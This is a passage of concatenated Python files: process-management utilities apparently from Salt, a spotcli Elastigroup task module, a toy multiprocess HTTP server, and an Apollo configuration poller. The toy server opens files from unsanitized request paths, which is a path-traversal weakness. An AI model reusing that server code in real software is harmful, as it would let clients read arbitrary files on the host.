from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
def appendproctitle(name):
'''
Append "name" to the current process title
'''
if HAS_SETPROCTITLE:
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + name)
def daemonize(redirect_out=True):
'''
Daemonize a process
'''
# Avoid circular import
import salt.utils.crypt
try:
pid = os.fork()
if pid > 0:
# exit first parent
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error('fork #1 failed: %s (%s)', exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir('/')
# noinspection PyArgumentList
os.setsid()
os.umask(18)
# do second fork
try:
pid = os.fork()
if pid > 0:
salt.utils.crypt.reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error('fork #2 failed: %s (%s)', exc.errno, exc)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
salt.utils.crypt.reinit_crypto()
# A normal daemonization redirects the process output to /dev/null.
# Unfortunately when a python multiprocess is called the output is
# not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with salt.utils.files.fopen('/dev/null', 'r+') as dev_null:
# Redirect python stdin/out/err
# and the os stdin/out/err which can be different
os.dup2(dev_null.fileno(), sys.stdin.fileno())
os.dup2(dev_null.fileno(), sys.stdout.fileno())
os.dup2(dev_null.fileno(), sys.stderr.fileno())
os.dup2(dev_null.fileno(), 0)
os.dup2(dev_null.fileno(), 1)
os.dup2(dev_null.fileno(), 2)
def daemonize_if(opts):
'''
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
'''
if 'salt-call' in sys.argv[0]:
return
if not opts.get('multiprocessing', True):
return
if sys.platform.startswith('win'):
return
daemonize(False)
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.path.which('systemd-notify') \
and systemd_notify_call('--booted'):
# Notify systemd synchronously
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
# Handle abstract namespace socket
if notify_socket.startswith('@'):
notify_socket = '\0{0}'.format(notify_socket[1:])
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.connect(notify_socket)
sock.sendall('READY=1'.encode())
sock.close()
except socket.error:
return systemd_notify_call('--ready')
return True
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.files.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid())) # future lint: disable=blacklisted-function
except IOError:
pass
log.debug('Created pidfile: %s', pidfile)
if salt.utils.platform.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('%s Traceback follows:', msg, exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: %s to user: %s', pidfile, user)
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
try:
with salt.utils.files.fopen(pidfile) as pdf:
pid = pdf.read().strip()
return int(pid)
except (OSError, IOError, TypeError, ValueError):
return None
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error('Process did not die with terminate(): %s', proc.pid)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug(
'ThreadPool executing func: %s with args=%s kwargs=%s',
func, args, kwargs
)
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.platform.is_windows():
# Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if six.text_type(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '%s' with pid %s", name, process.pid)
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info(
'Process %s (%s) died with exit status %s, restarting...',
self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode
)
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.platform.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
if async:
yield gen.sleep(10)
else:
time.sleep(10)
if len(self._process_map) == 0:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
log.trace('Process restart of %s', pid)
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# first lets reset signal handlers to default one to prevent running this twice
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.platform.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.files.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', six.text_type(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid %s: %s', pid, p_map['Process'])
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid %s: %s', pid, p_map['Process'])
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid %s: %s', pid, p_map['Process'])
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for # pylint: disable=str-format-in-logging
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for # pylint: disable=str-format-in-logging
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class'es run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.platform.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.platform.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.platform.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
if HAS_PSUTIL:
process = psutil.Process(self.pid)
if hasattr(process, 'children'):
for child in process.children(recursive=True):
if child.is_running():
child.terminate()
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace(
'Failed to register signal for signum %d: %s',
signum, exc
)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
tasks.py
|
import sys
import threading
from abc import ABC, abstractmethod
from collections import UserList
from typing import Dict, List, Optional, Union
import attr
import rich.console
from spotcli.providers.spot import SpotProvider
from spotcli.utils.elastigroup import Elastigroup, ElastigroupProcess
console = rich.console.Console(highlight=False)
class Alias(UserList):
def __init__(self, name: str, targets: List[str]):
self.name = name
self.targets = targets
@property
def data(self):
return self.targets
class TargetList(UserList):
def __init__(
self,
spot: SpotProvider,
aliases: Dict[str, Alias],
targets: Union[str, List[str]],
):
self.spot = spot
self.aliases = aliases
self.targets = targets
@property
def data(self):
try:
targets = getattr(self, "_targets")
except AttributeError:
def reduce(
array: Union[List[str], Alias, str], result: List[str] = []
) -> List[str]:
"""Flatten a list with arbitrary dimensions."""
if isinstance(array, str):
array = [array]
for item in array:
if isinstance(item, str):
if item in self.aliases:
reduce(self.aliases[item], result)
else:
result.append(item)
else:
reduce(item, result)
return result
targets = Elastigroup.find(self.spot.client(), reduce(self.targets))
setattr(self, "_targets", targets)
finally:
return targets
@attr.s(auto_attribs=True)
class Task(ABC):
kind: str
targets: TargetList
@classmethod
def register(cls, kind):
def decorator(subcls):
kinds = getattr(cls, "kinds", {})
kinds.update({kind: subcls})
setattr(cls, "kinds", kinds)
return subcls
return decorator
def __new__(cls, kind: str, *args, **kwargs) -> "Task":
if cls is not Task:
return super(Task, cls).__new__(cls, kind, *args, **kwargs) # type: ignore
try:
task = getattr(cls, "kinds", {})[kind]
return super(Task, cls).__new__(task)
except KeyError:
console.print(f"[bold red]ERROR:[/] Invalid action: {kind}")
sys.exit(1)
@abstractmethod
def run(self):
pass
@Task.register("roll")
@attr.s(auto_attribs=True)
class RollTask(Task):
batch: Optional[Union[str, int]] = ""
grace: Optional[Union[str, int]] = ""
def run(self):
def work(target, batch, grace, console):
try:
target.roll(batch, grace)
console.print(
f"Started roll on [bold blue]{target.name}[/] with [bold cyan]"
f"{self.batch if '%' in str(self.batch) else self.batch + ' instances'}[/] batch size"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to roll [bold]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(
target=target, batch=self.batch, grace=self.grace, console=console
),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("upscale")
@attr.s(auto_attribs=True)
class UpscaleTask(Task):
amount: Union[int, str]
def run(self):
def work(target, amount, console):
try:
target.scale_up(amount)
console.print(
f"Scaled up [bold blue]{target.name}[/] by [bold cyan]{amount if '%' in str(amount) else amount + ' instances'}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to scale up [bold]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, amount=self.amount, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("downscale")
@attr.s(auto_attribs=True)
class DownscaleTask(Task):
amount: Union[int, str]
def run(self):
def work(target, amount, console):
try:
target.scale_down(amount)
console.print(
f"Scaled down [bold blue]{target.name}[/] by [bold cyan]{amount if '%' in str(amount) else amount + ' instances'}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to scale down [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, amount=self.amount, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("suspend")
@attr.s(auto_attribs=True)
class SuspendTask(Task):
processes: List[str]
def run(self):
def work(target, process, console):
process = ElastigroupProcess[process]
try:
target.suspend(process)
console.print(
f"Suspended [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to suspend [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
for process in self.processes:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, process=process, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@Task.register("unsuspend")
@attr.s(auto_attribs=True)
class UnsuspendTask(Task):
processes: List[str]
def run(self):
def work(target, process, console):
process = ElastigroupProcess[process]
try:
target.unsuspend(process)
console.print(
f"Unsuspended [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
return True
except Exception:
console.print(
f"[bold red]ERROR:[/] Failed to unsuspend [bold cyan]{process.name}[/] on [bold blue]{target.name}[/]"
)
console.print_exception()
return False
threads = []
for target in self.targets:
for process in self.processes:
thread = threading.Thread(
None,
work,
kwargs=dict(target=target, process=process, console=console),
)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
@attr.s(auto_attribs=True)
class Scenario:
name: str
tasks: List[Task]
description: Optional[str] = ""
def run(self):
results = []
for task in self.tasks:
task.run()
|
simple_http_dynamic_server.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
import multiprocessing
import socket
import re
import time
class WSGIServer(object):
def __init__(self, ip, port):
# 1.创建套接字
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2.绑定ip和port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
# 3.主动变被动
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
request_lines = request.splitlines() # 当客户端主动关闭, 会收到空字符串并解阻塞; 这里会生成空列表
if not request_lines:
return
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2.返回HTTP格式的数据
# 假设以 .py 结尾的资源是 动态资源
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 准备发送给浏览器的数据 -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
# response += “哈哈哈哈”
# 将response header 发送给浏览器
new_socket.send(response.encode("utf-8"))
# 将response body 发送给服务器
new_socket.send(html_content)
else:
# 动态资源加载
print(file_name)
if file_name == "/login.py":
# 2.1 准备发送给浏览器的数据 -- header
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
body = "welcome xxx login website ....<br> login: %s" % time.ctime()
elif file_name == "/logout.py":
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
body = "xxx logout website ....<br> logout: %s" % time.ctime()
else:
header = "HTTP/1.1 404 NOT FOUND\r\n"
header += "\r\n"
body = "----------file not found --------"
response = header + body
new_socket.send(response.encode("utf-8"))
# 这里必须再关闭一次, 底层文件描述符
new_socket.close()
def runserver(self):
while True:
# 4.等待新客户端的连接
new_socket, client_addr = self.listen_server.accept()
# 5.为这个客户端服务
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
# 进程类实现的并发服务器,必须要在这里也new_socket.close一次; 原因:文件描述符 fd
new_socket.close()
# 关闭监听套接字
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
|
apollo.py
|
import json
import logging
import threading
import time
from http import HTTPStatus
from typing import Dict
import requests
from configalchemy import BaseConfig, ConfigType
time_counter = time.time
class ConfigException(Exception):
...
logger = logging.getLogger(__name__)
class ApolloBaseConfig(BaseConfig):
CONFIGALCHEMY_ENABLE_FUNCTION = True
APOLLO_USING_CACHE = False
APOLLO_SERVER_URL = ""
APOLLO_APP_ID = ""
APOLLO_CLUSTER = "default"
APOLLO_NAMESPACE = "application"
APOLLO_EXTRA_NAMESPACE = ""
APOLLO_EXTRA_NAMESPACE_PRIORITY = 9
APOLLO_LONG_POLL_TIMEOUT = 80
def __init__(self):
self.apollo_notification_map: Dict[str, ConfigType] = {}
super().__init__()
def start_long_poll(self):
logger.info("start long poll")
thread = threading.Thread(target=self.long_poll)
thread.daemon = True
thread.start()
return thread
def _access_config_by_namespace(self, namespace: str) -> ConfigType:
route = "configs"
if self.APOLLO_USING_CACHE:
route = "configfiles"
url = (
f"{self.APOLLO_SERVER_URL}/{route}/{self.APOLLO_APP_ID}/"
f"{self.APOLLO_CLUSTER}/{namespace}"
)
logger.info(f"Access apollo server url: {url}")
response = requests.get(url)
if response.ok:
data = response.json()
self.apollo_notification_map.setdefault(data["namespaceName"], {"id": -1})
self.apollo_notification_map[data["namespaceName"]]["data"] = data.get(
"configurations", {}
)
logger.debug(f"Got from apollo: {data}")
return data.get("configurations", {})
else:
raise ConfigException(f"loading config failed: {url}")
def configuration_function(self) -> ConfigType:
self.from_mapping(
self._access_config_by_namespace(self.APOLLO_NAMESPACE),
priority=self.CONFIGALCHEMY_FUNCTION_VALUE_PRIORITY,
)
for namespace in self.APOLLO_EXTRA_NAMESPACE.split(","):
if namespace:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.APOLLO_EXTRA_NAMESPACE_PRIORITY,
)
return {}
def long_poll_from_apollo(self):
url = f"{self.APOLLO_SERVER_URL}/notifications/v2/"
notifications = []
for key, value in self.apollo_notification_map.items():
notifications.append({"namespaceName": key, "notificationId": value["id"]})
r = requests.get(
url=url,
params={
"appId": self.APOLLO_APP_ID,
"cluster": self.APOLLO_CLUSTER,
"notifications": json.dumps(notifications, ensure_ascii=False),
},
timeout=self.APOLLO_LONG_POLL_TIMEOUT,
)
if r.status_code == HTTPStatus.NOT_MODIFIED:
logger.info("Apollo No change, loop...")
elif r.status_code == HTTPStatus.OK:
data = r.json()
for entry in data:
logger.info(
"%s has changes: notificationId=%d"
% (entry["namespaceName"], entry["notificationId"])
)
namespace = entry["namespaceName"]
if namespace == self.APOLLO_NAMESPACE:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.CONFIGALCHEMY_FUNCTION_VALUE_PRIORITY,
)
else:
self.from_mapping(
self._access_config_by_namespace(namespace),
priority=self.APOLLO_EXTRA_NAMESPACE_PRIORITY,
)
self.apollo_notification_map[entry["namespaceName"]]["id"] = entry[
"notificationId"
]
else: # pragma: no cover
raise ConfigException(f"{url} : unexpected status {r.status_code}")
def long_poll(self):
while True:
try:
logger.debug("start apollo configuration long poll")
self.long_poll_from_apollo()
